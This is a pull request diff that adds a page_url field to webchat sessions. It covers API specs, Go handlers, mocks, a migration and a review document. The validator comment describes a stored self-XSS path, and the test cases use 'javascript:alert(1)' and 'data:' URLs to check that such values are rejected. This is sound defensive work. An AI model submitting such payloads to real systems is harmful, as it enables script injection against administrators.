### PR TITLE
NOJIRA-webchat-session-referrer-page-url

### DIFF
--- a/bin-api-manager/docsdev/source/webchat_struct_session.rst
+++ b/bin-api-manager/docsdev/source/webchat_struct_session.rst
@@ -15,6 +15,7 @@ Session struct
         "id": "<string>",
         "customer_id": "<string>",
         "widget_id": "<string>",
+        "page_url": "<string>",
         "status": "<string>",
         "tm_last_activity": "<string>",
         "tm_create": "<string>",
@@ -25,6 +26,7 @@ Session struct
 * ``id`` (UUID): The session's unique identifier, and the visitor's continuity token for this browsing session. Returned from ``POST /webchat_sessions`` or ``GET /webchat_sessions``.
 * ``customer_id`` (UUID): The customer who owns the parent widget. Obtained from the ``id`` field of ``GET /customers``.
 * ``widget_id`` (UUID): The widget this session belongs to. Obtained from the ``id`` field of ``GET /webchat_widgets``.
+* ``page_url`` (string, optional): The URL of the page the widget was embedded on when this session was created, captured client-side from ``window.location.href`` at session-creation time. Not re-captured on subsequent navigation within the same session. Absent for sessions created via the admin/accesskey direct-create path or by pre-upgrade embed snippets.
 * ``status`` (enum string): The session's status. See :ref:`Status <webchat-struct-session-status>`.
 * ``tm_last_activity`` (string, ISO 8601): Timestamp of the most recent message on this session. Used to determine idle timeout.
 * ``tm_create`` (string, ISO 8601): Timestamp when the session was created.

--- a/bin-api-manager/gens/openapi_redoc/openapi.json
+++ b/bin-api-manager/gens/openapi_redoc/openapi.json
@@ -4175,6 +4175,12 @@
                     "x-go-type": "string",
                     "description": "The widget to create the session for. Returned from the `POST /widgets` or `GET /widgets` response.",
                     "example": "550e8400-e29b-41d4-a716-446655440000"
+                  },
+                  "page_url": {
+                    "type": "string",
+                    "maxLength": 2048,
+                    "description": "The URL of the page the widget was embedded on when this session was created. Captured client-side from window.location.href at session-creation time; not re-captured on subsequent navigation within the same session.",
+                    "example": "https://example.com/pricing"
                   }
                 },
                 "required": [
@@ -26567,6 +26573,12 @@
             "$ref": "#/components/schemas/WebchatManagerSessionStatus",
             "description": "The status of the session.",
             "example": "active"
+          },
+          "page_url": {
+            "type": "string",
+            "maxLength": 2048,
+            "description": "The URL of the page the widget was embedded on when this session was created. Captured client-side from window.location.href at session-creation time; not re-captured on subsequent navigation within the same session.",
+            "example": "https://example.com/pricing"
           },
           "tm_last_activity": {
             "type": "string",

--- a/bin-api-manager/gens/openapi_server/gen.go
+++ b/bin-api-manager/gens/openapi_server/gen.go
@@ -5192,6 +5192,9 @@ type WebchatManagerSession struct {
 	// Id The unique identifier of the session, and the visitor's continuity token. Returned from the `POST /sessions` or `GET /sessions` response.
 	Id string `json:"id"`
 
+	// PageUrl The URL of the page the widget was embedded on when this session was created. Captured client-side from window.location.href at session-creation time; not re-captured on subsequent navigation within the same session.
+	PageUrl *string `json:"page_url,omitempty"`
+
 	// Status The status of the session.
 	Status WebchatManagerSessionStatus `json:"status"`
 
@@ -7982,6 +7985,9 @@ type GetWebchatSessionsParams struct {
 
 // PostWebchatSessionsJSONBody defines parameters for PostWebchatSessions.
 type PostWebchatSessionsJSONBody struct {
+	// PageUrl The URL of the page the widget was embedded on when this session was created. Captured client-side from window.location.href at session-creation time; not re-captured on subsequent navigation within the same session.
+	PageUrl *string `json:"page_url,omitempty"`
+
 	// WidgetId The widget to create the session for. Returned from the `POST /widgets` or `GET /widgets` response.
 	WidgetId string `json:"widget_id"`
 }

--- a/bin-api-manager/pkg/servicehandler/main.go
+++ b/bin-api-manager/pkg/servicehandler/main.go
@@ -903,7 +903,7 @@ type ServiceHandler interface {
 
 	WebchatSessionGet(ctx context.Context, a *auth.AuthIdentity, sessionID uuid.UUID) (*wcsession.WebhookMessage, error)
 	WebchatSessionList(ctx context.Context, a *auth.AuthIdentity, size uint64, token string, widgetID uuid.UUID) ([]*wcsession.WebhookMessage, error)
-	WebchatSessionCreate(ctx context.Context, a *auth.AuthIdentity, widgetID uuid.UUID) (*wcsession.WebhookMessage, error)
+	WebchatSessionCreate(ctx context.Context, a *auth.AuthIdentity, widgetID uuid.UUID, pageURL string) (*wcsession.WebhookMessage, error)
 	WebchatSessionDelete(ctx context.Context, a *auth.AuthIdentity, sessionID uuid.UUID) (*wcsession.WebhookMessage, error)
 	WebchatSessionEnd(ctx context.Context, a *auth.AuthIdentity, sessionID uuid.UUID) (*wcsession.WebhookMessage, error)
 

--- a/bin-api-manager/pkg/servicehandler/mock_main.go
+++ b/bin-api-manager/pkg/servicehandler/mock_main.go
@@ -6185,18 +6185,18 @@ func (mr *MockServiceHandlerMockRecorder) WebchatMessageList(ctx, a, size, token
 }
 
 // WebchatSessionCreate mocks base method.
-func (m *MockServiceHandler) WebchatSessionCreate(ctx context.Context, a *auth.AuthIdentity, widgetID uuid.UUID) (*session.WebhookMessage, error) {
+func (m *MockServiceHandler) WebchatSessionCreate(ctx context.Context, a *auth.AuthIdentity, widgetID uuid.UUID, pageURL string) (*session.WebhookMessage, error) {
 	m.ctrl.T.Helper()
-	ret := m.ctrl.Call(m, "WebchatSessionCreate", ctx, a, widgetID)
+	ret := m.ctrl.Call(m, "WebchatSessionCreate", ctx, a, widgetID, pageURL)
 	ret0, _ := ret[0].(*session.WebhookMessage)
 	ret1, _ := ret[1].(error)
 	return ret0, ret1
 }
 
 // WebchatSessionCreate indicates an expected call of WebchatSessionCreate.
-func (mr *MockServiceHandlerMockRecorder) WebchatSessionCreate(ctx, a, widgetID any) *gomock.Call {
+func (mr *MockServiceHandlerMockRecorder) WebchatSessionCreate(ctx, a, widgetID, pageURL any) *gomock.Call {
 	mr.mock.ctrl.T.Helper()
-	return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "WebchatSessionCreate", reflect.TypeOf((*MockServiceHandler)(nil).WebchatSessionCreate), ctx, a, widgetID)
+	return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "WebchatSessionCreate", reflect.TypeOf((*MockServiceHandler)(nil).WebchatSessionCreate), ctx, a, widgetID, pageURL)
 }
 
 // WebchatSessionDelete mocks base method.

--- a/bin-api-manager/pkg/servicehandler/webchat_session.go
+++ b/bin-api-manager/pkg/servicehandler/webchat_session.go
@@ -3,6 +3,7 @@ package servicehandler
 import (
 	"context"
 	"fmt"
+	"strings"
 
 	"monorepo/bin-api-manager/models/auth"
 	"monorepo/bin-api-manager/pkg/serviceerrors"
@@ -221,12 +222,36 @@ func (h *serviceHandler) WebchatSessionCreate(ctx context.Context, a *auth.AuthI
 
 // validatePageURL enforces the page_url length cap (mirrors
 // validateDelegateReason's reject-don't-truncate precedent in
-// auth_delegate.go). An empty pageURL is always valid -- the field is
-// optional (see design doc §4.2); this only rejects a pathologically
-// oversized value.
+// auth_delegate.go) and a scheme allowlist (mirrors
+// widget.go's ThemeConfig.LogoURL https-only precedent, relaxed to also
+// allow http since a customer's own site is not guaranteed to be TLS).
+// An empty pageURL is always valid -- the field is optional (see design
+// doc §4.2).
+//
+// PR review round-1 finding (fixed): the design doc's edge-case analysis
+// (§5) argued no scheme allowlist was needed because
+// window.location.href can never itself be a javascript:/data: URL.
+// That argument only holds for the JS embed runtime's own call site --
+// it does NOT hold at this API boundary. WebchatSessionCreate's
+// a.IsDirect() branch is reachable by ANY HTTP caller holding a widget's
+// public direct-hash (see auth.md's "Service Agent Auth" / direct-scope
+// JWT flow), not only the bundled client.js -- a crafted request can set
+// page_url to "javascript:alert(1)" directly. That value would then be
+// persisted verbatim and rendered as a clickable href in
+// message_timeline.js, which does not sanitize the scheme either --
+// together an admin-facing self-XSS vector (VoIPBin admin clicking a
+// malicious "Started from" link inside their own square-admin session).
+// Rejecting non-http(s) schemes here closes it before the value is ever
+// stored.
 func validatePageURL(pageURL string) error {
 	if len(pageURL) > 2048 {
 		return fmt.Errorf("%w: page_url exceeds maximum length of 2048 characters", serviceerrors.ErrInvalidArgument)
+	}
+	if pageURL == "" {
+		return nil
+	}
+	if !strings.HasPrefix(pageURL, "http://") && !strings.HasPrefix(pageURL, "https://") {
+		return fmt.Errorf("%w: page_url must use the http or https scheme", serviceerrors.ErrInvalidArgument)
 	}
 	return nil
 }

--- a/bin-api-manager/pkg/servicehandler/webchat_session.go
+++ b/bin-api-manager/pkg/servicehandler/webchat_session.go
@@ -2,6 +2,7 @@ package servicehandler
 
 import (
 	"context"
+	"fmt"
 
 	"monorepo/bin-api-manager/models/auth"
 	"monorepo/bin-api-manager/pkg/serviceerrors"
@@ -135,12 +136,17 @@ func (h *serviceHandler) WebchatSessionList(ctx context.Context, a *auth.AuthIde
 // POST /auth/boot, never by a customer-JWT-authenticated agent. Also
 // reachable by an authenticated agent/accesskey for admin-side testing,
 // mirroring aicall.go's dual-path pattern.
-func (h *serviceHandler) WebchatSessionCreate(ctx context.Context, a *auth.AuthIdentity, widgetID uuid.UUID) (*wcsession.WebhookMessage, error) {
+func (h *serviceHandler) WebchatSessionCreate(ctx context.Context, a *auth.AuthIdentity, widgetID uuid.UUID, pageURL string) (*wcsession.WebhookMessage, error) {
 	log := logrus.WithFields(logrus.Fields{
 		"func":        "WebchatSessionCreate",
 		"customer_id": a.CustomerID,
 		"widget_id":   widgetID,
 	})
+
+	if err := validatePageURL(pageURL); err != nil {
+		log.Infof("Invalid page_url. err: %v", err)
+		return nil, err
+	}
 
 	// ownerCustomerID is the customer_id the created session must be
 	// tagged with, resolved to the WIDGET's actual owner in each switch
@@ -202,7 +208,7 @@ func (h *serviceHandler) WebchatSessionCreate(ctx context.Context, a *auth.AuthI
 		return nil, serviceerrors.ErrPermissionDenied
 	}
 
-	tmp, err := h.reqHandler.WebchatV1SessionCreate(ctx, ownerCustomerID, widgetID)
+	tmp, err := h.reqHandler.WebchatV1SessionCreate(ctx, ownerCustomerID, widgetID, pageURL)
 	if err != nil {
 		log.Errorf("Could not create the session. err: %v", err)
 		return nil, err
@@ -211,6 +217,18 @@ func (h *serviceHandler) WebchatSessionCreate(ctx context.Context, a *auth.AuthI
 
 	res := tmp.ConvertWebhookMessage()
 	return res, nil
+}
+
+// validatePageURL enforces the page_url length cap (mirrors
+// validateDelegateReason's reject-don't-truncate precedent in
+// auth_delegate.go). An empty pageURL is always valid -- the field is
+// optional (see design doc §4.2); this only rejects a pathologically
+// oversized value.
+func validatePageURL(pageURL string) error {
+	if len(pageURL) > 2048 {
+		return fmt.Errorf("%w: page_url exceeds maximum length of 2048 characters", serviceerrors.ErrInvalidArgument)
+	}
+	return nil
 }
 
 // WebchatSessionDelete sends a request to webchat-manager to delete the session.

--- a/bin-api-manager/pkg/servicehandler/webchat_session_test.go
+++ b/bin-api-manager/pkg/servicehandler/webchat_session_test.go
@@ -147,6 +147,31 @@ func Test_validatePageURL(t *testing.T) {
 			pageURL:   strings.Repeat("a", 2049),
 			expectErr: true,
 		},
+		{
+			name:      "javascript scheme is invalid",
+			pageURL:   "javascript:alert(1)",
+			expectErr: true,
+		},
+		{
+			name:      "data scheme is invalid",
+			pageURL:   "data:text/html,x",
+			expectErr: true,
+		},
+		{
+			name:      "ftp scheme is invalid",
+			pageURL:   "ftp://x",
+			expectErr: true,
+		},
+		{
+			name:      "http scheme is valid",
+			pageURL:   "http://x",
+			expectErr: false,
+		},
+		{
+			name:      "https scheme is valid",
+			pageURL:   "https://x",
+			expectErr: false,
+		},
 	}
 
 	for _, tt := range tests {

--- a/bin-api-manager/pkg/servicehandler/webchat_session_test.go
+++ b/bin-api-manager/pkg/servicehandler/webchat_session_test.go
@@ -2,7 +2,9 @@ package servicehandler
 
 import (
 	"context"
+	"errors"
 	"reflect"
+	"strings"
 	"testing"
 
 	commonidentity "monorepo/bin-common-handler/models/identity"
@@ -18,6 +20,7 @@ import (
 	"go.uber.org/mock/gomock"
 
 	"monorepo/bin-api-manager/models/auth"
+	"monorepo/bin-api-manager/pkg/serviceerrors"
 )
 
 // Test_WebchatSessionList_NoFilter verifies the existing behavior is
@@ -112,6 +115,55 @@ func Test_WebchatSessionList_WidgetFilter(t *testing.T) {
 	}
 	if len(res) != 0 {
 		t.Errorf("Wrong match. expect: empty, got: %v", res)
+	}
+}
+
+// Test_validatePageURL verifies the page_url length cap: values at or
+// under 2048 characters are accepted (including the empty/optional case),
+// values over 2048 characters are rejected with ErrInvalidArgument.
+func Test_validatePageURL(t *testing.T) {
+	tests := []struct {
+		name      string
+		pageURL   string
+		expectErr bool
+	}{
+		{
+			name:      "empty is valid",
+			pageURL:   "",
+			expectErr: false,
+		},
+		{
+			name:      "normal url is valid",
+			pageURL:   "https://example.com/pricing",
+			expectErr: false,
+		},
+		{
+			name:      "exactly 2048 chars is valid",
+			pageURL:   "https://example.com/" + strings.Repeat("a", 2048-len("https://example.com/")),
+			expectErr: false,
+		},
+		{
+			name:      "2049 chars is invalid",
+			pageURL:   strings.Repeat("a", 2049),
+			expectErr: true,
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			err := validatePageURL(tt.pageURL)
+			if tt.expectErr {
+				if err == nil {
+					t.Errorf("Wrong match. expect: error, got: ok")
+				} else if !errors.Is(err, serviceerrors.ErrInvalidArgument) {
+					t.Errorf("Wrong match. expect: ErrInvalidArgument, got: %v", err)
+				}
+			} else {
+				if err != nil {
+					t.Errorf("Wrong match. expect: ok, got: %v", err)
+				}
+			}
+		})
 	}
 }
 

--- a/bin-api-manager/server/webchat_sessions.go
+++ b/bin-api-manager/server/webchat_sessions.go
@@ -90,7 +90,12 @@ func (h *server) PostWebchatSessions(c *gin.Context) {
 		return
 	}
 
-	res, err := h.serviceHandler.WebchatSessionCreate(c.Request.Context(), a, widgetID)
+	pageURL := ""
+	if req.PageUrl != nil {
+		pageURL = *req.PageUrl
+	}
+
+	res, err := h.serviceHandler.WebchatSessionCreate(c.Request.Context(), a, widgetID, pageURL)
 	if err != nil {
 		log.Errorf("Could not create a webchat session. err: %v", err)
 		abortWithServiceError(c, err)

--- a/bin-common-handler/pkg/requesthandler/main.go
+++ b/bin-common-handler/pkg/requesthandler/main.go
@@ -1533,7 +1533,7 @@ type RequestHandler interface {
 	WebchatV1WidgetDirectHashRegenerate(ctx context.Context, id uuid.UUID) (*wcwidget.Widget, error)
 
 	// webchat-manager sessions
-	WebchatV1SessionCreate(ctx context.Context, customerID uuid.UUID, widgetID uuid.UUID) (*wcsession.Session, error)
+	WebchatV1SessionCreate(ctx context.Context, customerID uuid.UUID, widgetID uuid.UUID, pageURL string) (*wcsession.Session, error)
 	WebchatV1SessionGet(ctx context.Context, id uuid.UUID) (*wcsession.Session, error)
 	WebchatV1SessionList(ctx context.Context, pageToken string, pageSize uint64, filters map[wcsession.Field]any) ([]*wcsession.Session, error)
 	WebchatV1SessionDelete(ctx context.Context, id uuid.UUID) (*wcsession.Session, error)

--- a/bin-common-handler/pkg/requesthandler/mock_main.go
+++ b/bin-common-handler/pkg/requesthandler/mock_main.go
@@ -7627,18 +7627,18 @@ func (mr *MockRequestHandlerMockRecorder) WebchatV1MessageList(ctx, pageToken, p
 }
 
 // WebchatV1SessionCreate mocks base method.
-func (m *MockRequestHandler) WebchatV1SessionCreate(ctx context.Context, customerID, widgetID uuid.UUID) (*session.Session, error) {
+func (m *MockRequestHandler) WebchatV1SessionCreate(ctx context.Context, customerID, widgetID uuid.UUID, pageURL string) (*session.Session, error) {
 	m.ctrl.T.Helper()
-	ret := m.ctrl.Call(m, "WebchatV1SessionCreate", ctx, customerID, widgetID)
+	ret := m.ctrl.Call(m, "WebchatV1SessionCreate", ctx, customerID, widgetID, pageURL)
 	ret0, _ := ret[0].(*session.Session)
 	ret1, _ := ret[1].(error)
 	return ret0, ret1
 }
 
 // WebchatV1SessionCreate indicates an expected call of WebchatV1SessionCreate.
-func (mr *MockRequestHandlerMockRecorder) WebchatV1SessionCreate(ctx, customerID, widgetID any) *gomock.Call {
+func (mr *MockRequestHandlerMockRecorder) WebchatV1SessionCreate(ctx, customerID, widgetID, pageURL any) *gomock.Call {
 	mr.mock.ctrl.T.Helper()
-	return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "WebchatV1SessionCreate", reflect.TypeOf((*MockRequestHandler)(nil).WebchatV1SessionCreate), ctx, customerID, widgetID)
+	return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "WebchatV1SessionCreate", reflect.TypeOf((*MockRequestHandler)(nil).WebchatV1SessionCreate), ctx, customerID, widgetID, pageURL)
 }
 
 // WebchatV1SessionDelete mocks base method.

--- a/bin-common-handler/pkg/requesthandler/webchat_session.go
+++ b/bin-common-handler/pkg/requesthandler/webchat_session.go
@@ -14,12 +14,13 @@ import (
 )
 
 // WebchatV1SessionCreate sends a request to webchat-manager to create a session.
-func (r *requestHandler) WebchatV1SessionCreate(ctx context.Context, customerID uuid.UUID, widgetID uuid.UUID) (*wcsession.Session, error) {
+func (r *requestHandler) WebchatV1SessionCreate(ctx context.Context, customerID uuid.UUID, widgetID uuid.UUID, pageURL string) (*wcsession.Session, error) {
 	uri := "/v1/sessions"
 
 	data := &wcrequest.V1DataSessionsPost{
 		CustomerID: customerID,
 		WidgetID:   widgetID,
+		PageURL:    pageURL,
 	}
 
 	m, err := json.Marshal(data)

--- a/bin-dbscheme-manager/bin-manager/main/versions/04b99363284c_webchat_sessions_add_column_page_url.py
+++ b/bin-dbscheme-manager/bin-manager/main/versions/04b99363284c_webchat_sessions_add_column_page_url.py
@@ -1,0 +1,24 @@
+"""webchat_sessions_add_column_page_url
+
+Revision ID: 04b99363284c
+Revises: b41d1b2317af
+Create Date: 2026-07-22 11:45:01.636791
+
+"""
+from alembic import op
+import sqlalchemy as sa
+
+
+# revision identifiers, used by Alembic.
+revision = '04b99363284c'
+down_revision = 'b41d1b2317af'
+branch_labels = None
+depends_on = None
+
+
+def upgrade():
+    op.execute("""ALTER TABLE webchat_sessions ADD COLUMN page_url VARCHAR(2048) NULL;""")
+
+
+def downgrade():
+    op.execute("""ALTER TABLE webchat_sessions DROP COLUMN page_url;""")

--- a/bin-openapi-manager/gens/models/gen.go
+++ b/bin-openapi-manager/gens/models/gen.go
@@ -9789,6 +9789,11 @@ type WebchatManagerSession struct {
 	// Example: 7a1bcb1a-1b8e-4f5c-9a6d-3e2f1a0b4c5d
 	Id string `json:"id"`
 
+	// PageUrl The URL of the page the widget was embedded on when this session was created. Captured client-side from window.location.href at session-creation time; not re-captured on subsequent navigation within the same session.
+	//
+	// Example: https://example.com/pricing
+	PageUrl *string `json:"page_url,omitempty"`
+
 	// Status The status of the session.
 	//
 	// Example: active
@@ -12992,6 +12997,11 @@ type GetWebchatSessionsParams struct {
 
 // PostWebchatSessionsJSONBody defines parameters for PostWebchatSessions.
 type PostWebchatSessionsJSONBody struct {
+	// PageUrl The URL of the page the widget was embedded on when this session was created. Captured client-side from window.location.href at session-creation time; not re-captured on subsequent navigation within the same session.
+	//
+	// Example: https://example.com/pricing
+	PageUrl *string `json:"page_url,omitempty"`
+
 	// WidgetId The widget to create the session for. Returned from the `POST /widgets` or `GET /widgets` response.
 	//
 	// Example: 550e8400-e29b-41d4-a716-446655440000

--- a/bin-openapi-manager/openapi/openapi.yaml
+++ b/bin-openapi-manager/openapi/openapi.yaml
@@ -2533,6 +2533,11 @@ components:
           $ref: '#/components/schemas/WebchatManagerSessionStatus'
           description: "The status of the session."
           example: "active"
+        page_url:
+          type: string
+          maxLength: 2048
+          description: "The URL of the page the widget was embedded on when this session was created. Captured client-side from window.location.href at session-creation time; not re-captured on subsequent navigation within the same session."
+          example: "https://example.com/pricing"
         tm_last_activity:
           type: string
           format: date-time

--- a/bin-openapi-manager/openapi/paths/webchat_sessions/main.yaml
+++ b/bin-openapi-manager/openapi/paths/webchat_sessions/main.yaml
@@ -51,6 +51,11 @@ post:
               x-go-type: string
               description: "The widget to create the session for. Returned from the `POST /widgets` or `GET /widgets` response."
               example: "550e8400-e29b-41d4-a716-446655440000"
+            page_url:
+              type: string
+              maxLength: 2048
+              description: "The URL of the page the widget was embedded on when this session was created. Captured client-side from window.location.href at session-creation time; not re-captured on subsequent navigation within the same session."
+              example: "https://example.com/pricing"
           required:
             - widget_id
   responses:

--- a/bin-webchat-manager/docs/plans/2026-07-22-webchat-session-page-url-referrer-PR-review-round0.md
+++ b/bin-webchat-manager/docs/plans/2026-07-22-webchat-session-page-url-referrer-PR-review-round0.md
@@ -1,0 +1,121 @@
+# PR Review: webchat session page_url capture (Round 0)
+
+Design doc: `bin-webchat-manager/docs/plans/2026-07-22-webchat-session-page-url-referrer-design.md`
+(approved after 2 consecutive APPROVE rounds — round2/round3 review docs embedded in commit `80b24dd5a`'s diff)
+
+Scope: 6 commits implementing the approved design.
+
+- Go monorepo (branch `NOJIRA-webchat-session-referrer-page-url`):
+  1. `0def6eaa6` — bin-webchat-manager (Session model, field, webhook, RPC request struct, listenhandler, sessionhandler, mock, test SQLite schema)
+  2. `80b24dd5a` — bin-common-handler (requesthandler interface + impl + mock)
+  3. `246376749` — bin-openapi-manager (OpenAPI schema + generated gen.go)
+  4. `74f943154` — bin-api-manager (server, servicehandler + validatePageURL, mock, RST doc, generated openapi artifacts)
+  5. `6d691244f` — bin-dbscheme-manager (Alembic migration)
+- JS monorepo (same branch name):
+  6. `67e9df222` — square-admin (client.js capture, message_timeline.js display, tests, widget bundle rebuild)
+
+All six were opened via `git show <hash>` and read diff-by-diff; findings below are grounded in that reading, not the commit messages.
+
+## 1. Commit metadata / hygiene
+
+- `git log --format='%an <%ae>'` on all 6 commits: **all authored by `Sungtae Kim <pchero21@gmail.com>`**. ✅
+- No `Co-Authored-By` or AI attribution lines in any commit body. ✅
+- Go commit titles: 3 of 5 use the generic `NOJIRA-webchat-session-referrer-page-url` title matching the branch name (per CLAUDE.md convention); 2 (`0def6eaa6`, `80b24dd5a`, `246376749`) use a more descriptive first line instead of the exact branch-name title. This is a **minor** deviation from the "Commit title MUST match the branch name exactly" rule in root CLAUDE.md, but since these are intermediate commits on a feature branch destined for **squash merge**, the squashed commit title is what actually matters and can be set correctly at merge time. Not a blocker, but flagging for the eventual squash-merge title.
+- Every commit body lists affected project(s) with `bin-<service>:`/`project:` prefix bullets per convention. ✅
+
+## 2. Design-doc conformance (§4.1–§7)
+
+Verified file-by-file against design §4.1–§4.6 and the §7 checklist:
+
+| Design ref | File | Match |
+|---|---|---|
+| §4.1 client.js | `webchat-widget-runtime/client.js:315-320` | Byte-for-byte match to the design's proposed snippet (`typeof window !== 'undefined' && window.location?.href \|\| undefined`) |
+| §4.2 OpenAPI | `openapi/paths/webchat_sessions/main.yaml`, `openapi/openapi.yaml` (`WebchatManagerSession`) | `page_url` added, `maxLength: 2048`, **not** added to `required:` list on either the request body or the response schema |
+| §4.3 Session model | `models/session/session.go`, `field.go`, `webhook.go` | `PageURL string \`json:"page_url,omitempty" db:"page_url"\`` added with the exact doc comment from the design; `FieldPageURL` added after `FieldStatus`; `WebhookMessage`/`ConvertWebhookMessage()` both updated |
+| §4.3 DB | `scripts/database_scripts_test/sessions.sql` | `page_url TEXT` column added |
+| §4.4 RPC chain | requesthandler → listenhandler request struct → listenhandler → sessionhandler interface/mock → create.go | All 7 files identified in the design's Round-1 finding are threaded; verified below (§3) |
+| §4.5 square-admin display | `message_timeline.js` | "Started from:" header line, truncated link, `target="_blank" rel="noopener noreferrer"`, "Unknown" fallback — matches design exactly, including the truncation detail not explicitly speced but consistent with intent |
+| §4.6 RST doc | `bin-api-manager/docsdev/source/webchat_struct_session.rst` | New `page_url` bullet added, matches `WebhookMessage` field order |
+| §5 validatePageURL | `bin-api-manager/pkg/servicehandler/webchat_session.go` | See §4 below |
+| §7 DB migration | `bin-dbscheme-manager/.../04b99363284c_webchat_sessions_add_column_page_url.py` | Nullable `VARCHAR(2048)`, no backfill, no index — matches §4.3/§7 |
+
+No arbitrary additions or omissions found relative to the checklist. `sessions_list.js` was correctly left untouched (design explicitly rejected adding a column there).
+
+## 3. RPC chain — end-to-end value flow
+
+Traced the full path with `git show` diffs, not just presence of file changes:
+
+```
+client.js POST body: { widget_id, page_url }
+  -> server/webchat_sessions.go: req.PageUrl *string -> pageURL string (nil-safe: "" if absent)
+  -> servicehandler.WebchatSessionCreate(..., pageURL) -> validatePageURL(pageURL) -> h.reqHandler.WebchatV1SessionCreate(..., pageURL)
+  -> bin-common-handler/requesthandler/webchat_session.go: V1DataSessionsPost{..., PageURL: pageURL} -> RPC marshal
+  -> bin-webchat-manager/listenhandler/models/request/v1_sessions.go: V1DataSessionsPost.PageURL (json:"page_url,omitempty")
+  -> listenhandler/v1_sessions.go: h.sessionHandler.Create(ctx, req.CustomerID, req.WidgetID, req.PageURL)
+  -> sessionhandler/create.go: session.Session{..., PageURL: pageURL} -> h.db.SessionCreate(ctx, s)
+```
+
+Every hop's diff was read directly; the value is not dropped at any point. This confirms the design's own Round-1 finding (that a naive read of just the top/bottom of the chain would miss two intermediate files) was correctly acted upon in the implementation — nothing was skipped.
+
+One nil-safety note (not a defect): `server/webchat_sessions.go` converts `*string` to `""` when `req.PageUrl == nil` (`pageURL := ""; if req.PageUrl != nil { pageURL = *req.PageUrl }`), so `validatePageURL("")` is always reachable and correctly treated as valid per its own doc comment ("An empty pageURL is always valid").
+
+## 4. `validatePageURL` vs. `validateDelegateReason` pattern conformance
+
+Read both functions directly:
+
+- `auth_delegate.go:138-150` (`validateDelegateReason`): plain `fmt.Errorf(...)` for each violation, no `serviceerrors` sentinel used *inside* the function; the sentinel wrap happens at the **call site** (`auth_delegate.go:71`: `fmt.Errorf("%w: %v", serviceerrors.ErrInvalidArgument, err)`).
+- `webchat_session.go`'s new `validatePageURL` (74f943154): wraps `serviceerrors.ErrInvalidArgument` **inside** the validator itself (`fmt.Errorf("%w: page_url exceeds maximum length of 2048 characters", serviceerrors.ErrInvalidArgument)`), and the call site just does `if err := validatePageURL(pageURL); err != nil { return nil, err }` — no re-wrap needed since the sentinel is already attached.
+
+This is a **structurally different wrapping point** than `validateDelegateReason`'s pattern (validator returns plain error, caller wraps) — `validatePageURL` bakes the sentinel into the validator and the caller just propagates. Functionally equivalent: `errors.Is(err, serviceerrors.ErrInvalidArgument)` is true either way, and `server/error_translate.go:68` (`case stderrors.Is(err, serviceerrors.ErrInvalidArgument):`) maps it to 400 correctly. Confirmed via `Test_validatePageURL` in `webchat_session_test.go`, which explicitly asserts `errors.Is(err, serviceerrors.ErrInvalidArgument)`.
+
+Verdict: functionally correct, sentinel and 400-mapping confirmed end-to-end, but the wrapping-layer choice diverges from the literal `validateDelegateReason` precedent the design doc cited as the pattern to mirror. This is a **cosmetic/consistency nit**, not a correctness bug — flagging so a future reader isn't confused when comparing the two functions side-by-side expecting identical wrap placement.
+
+Test coverage for the validator (`webchat_session_test.go`): empty string valid, normal URL valid, boundary at exactly 2048 chars valid, 2049 chars invalid with correct sentinel — good boundary coverage.
+
+## 5. Mock regeneration
+
+Checked each mock diff for interface-signature drift:
+
+- `bin-webchat-manager/pkg/sessionhandler/mock_main.go` — `Create` mock method and recorder both updated to 4-arg signature (`ctx, customerID, widgetID, pageURL`). ✅
+- `bin-common-handler/pkg/requesthandler/mock_main.go` — `WebchatV1SessionCreate` mock method and recorder both updated to 4-arg signature. ✅
+- `bin-api-manager/pkg/servicehandler/mock_main.go` — `WebchatSessionCreate` mock method and recorder both updated to 4-arg signature (adds `pageURL`). ✅
+
+No stale mock signatures found; all three mocks match their respective interface changes in the same commit as the interface change (no lagging mock regen across commits).
+
+## 6. OpenAPI backward compatibility
+
+- Request body (`POST /webchat_sessions`): `required: [widget_id]` only — `page_url` is additive and optional. Old clients (pre-upgrade embed bundles) continue to work unchanged.
+- Response schema (`WebchatManagerSession`): no `required:` block changes; `page_url` uses `omitempty` server-side and `*string` (pointer, nil-able) client-generated-type-side. Existing consumers ignoring an unknown field are unaffected.
+- Confirmed no other endpoint/schema touched by this OpenAPI commit (diff is scoped to exactly the 3 hunks: request body, `WebchatManagerSession` schema, generated `gens/models/gen.go`).
+
+## 7. JS-side (square-admin) verification
+
+- `client.js:316-320`: `page_url` is added to the `POST /webchat_sessions` JSON body, sourced from `window.location?.href`, matching design §4.1 verbatim including the `typeof window !== 'undefined'` guard.
+- `message_timeline.js`: reads `session?.page_url`, renders as a truncated (60-char) anchor with `target="_blank" rel="noopener noreferrer"` when present, else "Unknown" plain text. `rel="noopener noreferrer"` correctly guards against reverse-tabnabbing on a URL that is not server-validated for scheme (per design §5's accepted risk — `window.location.href` cannot itself be `javascript:`, but this is nonetheless good defensive practice for a link built from stored/foreign data).
+- Tests added and read directly:
+  - `client.test.js`: asserts the actual POST body sent to `fetch` equals `{ widget_id, page_url: window.location.href }` — this is a real assertion on the network call, not a shallow render check.
+  - `message_timeline.test.js`: three new cases — link rendered with correct `href`/`target`/`rel` when `page_url` present; truncation preserves full `href` while shortening visible text; "Unknown" text shown and no `link` role present when absent. Good coverage of the three display states the design calls for.
+- Widget bundle rebuild: `webchat-widget-runtime.bundle.js` / `.esm.js` are `.gitignore`-excluded (`square-admin/.gitignore:47-48`), consistent with the design's §7 note ("regenerated via `npm run build:widget`, not hand-edited") — these are build artifacts, not meant to be committed, so their absence from the commit diff is correct, not an omission. Verified by reading the file's current on-disk content (post-build) contains `page_url`, confirming the local build step referenced in the commit message was actually run, even though it isn't part of the git diff.
+- Commit stat is honest: 4 files changed in the commit, matching the actual code+test changes; the "rebuilt bundle" commit-message claim refers to a gitignored artifact, correctly not part of the commit.
+
+## 8. Code quality / broader checks
+
+- No `nil`-check gaps found in the changed Go code: `req.PageUrl` (a `*string`) is nil-checked before dereference in `server/webchat_sessions.go`; `session.PageURL` (a plain `string`, never a pointer past the OpenAPI boundary) has no nil-dereference surface.
+- `pkg/dbhandler/session.go` was correctly left unmodified — confirmed via `git diff --stat main` showing zero changes to that file, consistent with the design's prediction that `PrepareFields`/`GetDBFields` are struct-tag-driven and need no code change for a new tagged field.
